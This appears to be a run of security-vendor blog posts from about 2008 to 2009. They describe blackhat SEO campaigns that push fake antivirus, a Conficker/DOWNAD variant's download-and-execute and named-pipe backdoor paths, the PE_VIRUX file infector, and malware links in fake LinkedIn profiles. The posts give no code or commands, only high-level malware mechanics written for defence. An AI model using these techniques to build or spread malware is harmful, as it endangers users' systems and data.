Cybercriminals take the low road once again as they pepper the Internet with blackhat SEO links that are likely to attract users searching for news about the death of Charlie’s Angels star Farrah Fawcett, who, at age 62, finally ended a long struggle with cancer.

Figure 1. Blackhat SEO links for Farrah Fawcett searches sets in

Hosted on is-the-boss domains (last seen in the H1N1 blackhat SEO attack), the links that come up in search results redirect to other URLs that eventually land on all-too-familiar territory: a rogue antivirus download.

In one specific infection chain traced by Research Manager Ivan Macalintal, the initial link redirects to another URL in the same domain, and then redirects another URL that has referrer checks before unfolding its contents. This is an evasion technique used by cybercriminals to avoid analysis by security researchers or being crawled (and rated) by search engines.

Once the requester is cleared, the URL redirects to two more URLs before finally landing on a download page (within a certain thesecuritytools domain–now blocked by Trend Micro). The page downloads install.exe, which is a rogue antivirus detected as TROJ_FAKEAV.BBM.

As this report is being written our engineers are analyzing the behavior of this malware. Trend Micro Smart Protection Network already blocks malicious URLs related to this attack.

Not long after news of Farrah Fawcett’s passing hit mainstream news, singer/entertainer Michael Jackson likewise meets an untimely death. Users are advised to exercise extreme caution in searching for related news and information surrounding the deaths of these celebrities.

One of the more famous blackhat SEO manipulation attack we have documented thus far include the attack that happened shortly after Heath Ledger’s death.

Update (2:30 am (UTC-7)): TROJ_FAKEAV.BBM behaves fairly similarly to other rogue antivirus we’ve seen to date. Here’s a screenshot of its “scanning window”:

Figure 2. The rogue antivirus program’s window

Users who have the misfortune of coming across “System Security Antivirus” are advised to run their legitimate antivirus if this makes an appearance on their system.

There have been some concerns over whether another new Conficker variant (DOWNAD for Trend Micro) has been released or not. Recall that in January, we have witnessed cybercriminals update WORM_DOWNAD.A‘s routines to include being able to propagate via more channels to become WORM_DOWNAD.AD. Reports talk of yet more updated functionalities in a more recent Conficker run.

This variant, which we also detect as WORM_DOWNAD.AD, has brought in two new paths for binary validation and execution. Both bypass the use of Internet Rendezvous points which, for the earlier variant, is used by bot masters to make contact with DOWNAD drones for tracking or new payload updates:

• One path is in an extension to netapi32.dll which checks for URLs in RPC traffic. If valid, the file from the URL is downloaded, and if the file is valid for the malware’s purposes, the file is executed.
• The other new path is when the malware creates a named pipe which it will use to receive any URL sent by the botmaster, much like a backdoor. The malware reads from the named pipe and, if it does not return an error, passes it to another function which will then download, validate and execute a file.

Fortunately for Trend Micro users, Smart Protection Network has been protecting their computers early on since Trend Micro also detects this malware as WORM_DOWNAD.AD. Infected users should read and follow the instructions at the solution page for this malware here. We also provide a fixtool which can likewise help non-Trend Micro users.

Conficker/DOWNAD entries here:

• The Mess That Is Worm Downad
• Security Policy for Dummies – how to avoid WORM_DOWNAD infection
• Security in Recession
• DOWNAD Gearing up for a Botnet

There are an increasing number of reports from several countries about a complex file infector with several infection routines. Arriving via the Internet, this new strain bypasses the Windows Firewall, infects using various infection types and using more than one layer of encryption. The US seems to be the most affected amongst all other regions as of this writing.

Typical file infectors choose any of the following infection styles:

• cavity – the virus inserts its code into available spaces within the normal file
• appending – the virus inserts its code after the normal file’s code
• prepending – the virus inserts its code before the normal file’s code
• entry-point obscuring – a complex infection technique used to evade immediate detection

The VIRUX strain, however, uses the following infection schema:

Figure 1. PE_VIRUX hunts down target files and infects them using more than one infection technique and sometimes more than one encryption routine

It can and will infect both .EXE and .SCR files using the above scheme, turning them into PE_VIRUX variants themselves. The ultimate payload might explain the pains that the cybercriminals took to make cleaning PCs of this infection difficult: this file infector connects to IRC servers, after which it joins a channel to receive and execute commands on the affected PC. It is “anything goes” from there.

PE_VIRUX.A also connects to websites to download files. A little earlier this week it was downloading TROJ_INJECTOR.AR, however, a few hours after that the URL began downloading another PE_VIRUX variant.

Apart from the above routine, PE_VIRUX also infects script files. For script files (.PHP, .ASP, and .HTML), PE_VIRUX inserts a malicious IFrame code, which is automatically loaded when the script files are opened. Trend Micro detects infected scripts as HTML_IFRAME.NV. This catapults the possibility of spreading even farther; if the script files happen to be uploaded to a publicly accessible website, any visitor to the affected sites will be led to the URL embedded in the iFrame code. Undoubtedly malicious, the said URL automatically downloads HTML_XPLOIT.V onto the system, which in turn downloads PE_VIRUT.BO.

PE_VIRUT.BO, on the other hand, when cleaned, becomes TROJ_VIRUX.A. This Trojan connects to websites, which, as of this writing, are inaccessible, but may go live any time.

PE_VIRUX variants also infects files of similar file types located in all of the infected PC’s physical drives, folders and subfolders.

Figure 2. PE_VIRUX Infection Diagram

Readers may recall a file infector of a similar name, PE_VIRUT, which likewise wreaked havoc due to its nasty infection routines. See the following blog entries discussing this threat:

• Woody Allen is Dead Says PE VIRUT
• Bogus Microsoft Update Delivers Nasty File Infectors
• Adobe Reader Vulnerability Actively Being Exploited

While we are careful in noting the similarities between the two, TrendLabs engineers are quick to point out that VIRUX is indeed a notch higher than VIRUT in terms of complexity (which is the cybercriminals’ bid for malware persistence and increasing likelihood of reinfection).

TrendLabs engineers are working on an in-depth analysis of this malware. Trend Micro Smart Protection Network blocks all URLs related to this entire attack, ensuring users are protected from ever accessing them. See the complete malware description of PE_VIRUX.A at its Virus Encyclopedia entry.

The LinkedIn professional networking site connects more than 30 million users from across many different industries. The advantages of maintaining a list of trusted business contacts for career planning purposes is not lost on LinkedIn‘s users.

The fostering of business relationships is further enhanced by features such as LinkedIn Answers and access from mobile devices.

Advanced Threats Researcher Ivan Macalintal found some bogus LinkedIn profiles which contain links to malware, using the  names and images of  famous personalities such as:

• Beyoncé Knowles
• Victoria Beckham
• Christina Ricci
• Kirsten Dunst
• Salma Hayek
• Kate Hudson

… and several others.

Below is a screenshot of the previously mentioned fake Beyoncé LinkedIn profile, with malicious links highlighted:

Bogus Profile of Beyoncé Knowles

Malicious links contained in these bogus profiles lead browsers through a series of redirections, but ultimately to malware.

Note that there are several routes this infection path may take. We are conducting a deeper investigation of these attacks in order best provide detection and protection against these threats. We will update this blog entry with additional information when it is available.

Update as of January 6 2008, 10:00 PM PST

The malicious file downloaded from the links contained in the mentioned fake profiles is detected by Trend Micro as TROJ_DLOAD.ML. Upon execution, TROJ_DLOAD.ML accesses certain URLs to download files detected as the following:

• TROJ_DLOAD.PN
• TROJ_DLOAD.PI
• TROJ_DLOAD.PG

In turn, these files attempt to download a fake antivirus application detected by Trend Micro as TROJ_FAKEAV.GDS.

Cybercriminals are said to be using pre-registered accounts on social networks as launchpads for this type of attack. Such pre-registered accounts are reportedly being sold in the black market today.

Update as of January 8 2008, 7:00 AM PST

Reports suggest that the previously mentioned pre-registered accounts are sold in black markets by the hundreds. The accounts are then used to send spam inside affected social networks.

Update as of January 15 2008

Analysis by Trend Micro researchers reveal that TROJ_FAKEAV.GDS has the following routines:

Upon execution, it displays the following GUI:

Figure 1. Fake antivirus software GUI

It also displays an icon on the system bar and a fake message alert:

Figure 2. Alarming warnings designed to rattle the user

When the user clicks the abovementioned message alert, the following fake Microsoft Security Center GUI is displayed:

Figure 3.Fake Microsoft Security Center GUI

Furthermore, clicking any link on the abovementioned Microsoft Security Center GUI will display the following prompt for registration:

Figure 4.Users are asked to register to be able to rid their system of viruses allegedly affecting it

We gathered malware data from January to November 2008 to give us an idea of just how dangerous surfing the Internet is. We analyzed the arrival methods of the top 100 malware infecting the most number of systems for the said period and came up with the following statistics:

Figure 1. Infection Vectors of Top 100 Malware

Coverage: Malware Analyzed by Trend Micro Researchers
Date Range: January 1, 2008 to November 25, 2008

This allows us to make some interesting insights:

1. Globally, the source of the most number of infections for these top 100 malware is the Internet, specifically in surfing unknown or malicious sites, or accepting links offered in unsolicited email.
2. The second highest source of infections is the presence of other malware on already infected systems. Since threats today are multipcomponent, malware routine frequently include retrieving files from remote locations and downloading them onto the PCs for added functionality or stealth.
3. The third highest source of infections is the opening of email attachments that come from unknown or malicious sources.
4. The percentages do not add up to 100% because most malware we have analyzed arrive on systems using more than one infection vector. This reflects the inherent flexibility of using the Internet: a Trojan may be hosted on a malicious website, which can reach a target system through (1) a spammed email containing a link to the Trojan, (2) direct download by accidentally surfing malicious sites (in search of, say, application cracks), (3) drive-by downloads (as in visiting a hacked legitimate site which has scripts that download and execute the Trojan automatically on visitors’ PCs), or (4) as a file downloaded by other Trojans already on the system.

Regional data reflects the same general trend:

Although overall still the land of adware, North America’s threat profile includes data-stealing malware that arrive via the Web.

Figure 2. Infection Vectors of Top Malware in North America

Malware borne by removable drives (portable / external hard drives, thumb drives, flash disks, memory cards, etc.) are at 15% in Asia and Australia. Most Asian countries have autorun malware as their top infectors, the highest concentration compared to other regions. However, the prevalence of file infectors and online gaming spyware in China has diluted this profile.

Figure 3. Infection Vectors of Top Malware in Asia and Australia

The top malware infecting PCs in Europe, Middle East and Africa (EMEA) also included several autorun malware, although in terms of number of PCs infected by any one malware, notorious Trojan downloaders are prominent in this region. EMEA also registered several infections via malicious iframes.

Figure 4. Infection Vectors of Top Malware in Europe, Middle East and Africa

Latin America’s top threats are varied in profile but the persistence of multicomponent attacks are distinctly apparent. Several malware found in PCs have in fact been dropped by other malware already present in the PC.

Figure 5. Infection Vectors of Top Malware in Latin America

Note however that this is not representative of the profiles of all malware samples–admittedly nobody can lay such a claim on any existing data set. What we are saying is that a majority of the top 100 malware that was most prevalent during this year arrived by surfing malicious or unknown sites. A sad confirmation that despite all awareness campaigns for safe computing, users still tend to victimize themselves out of curiosity.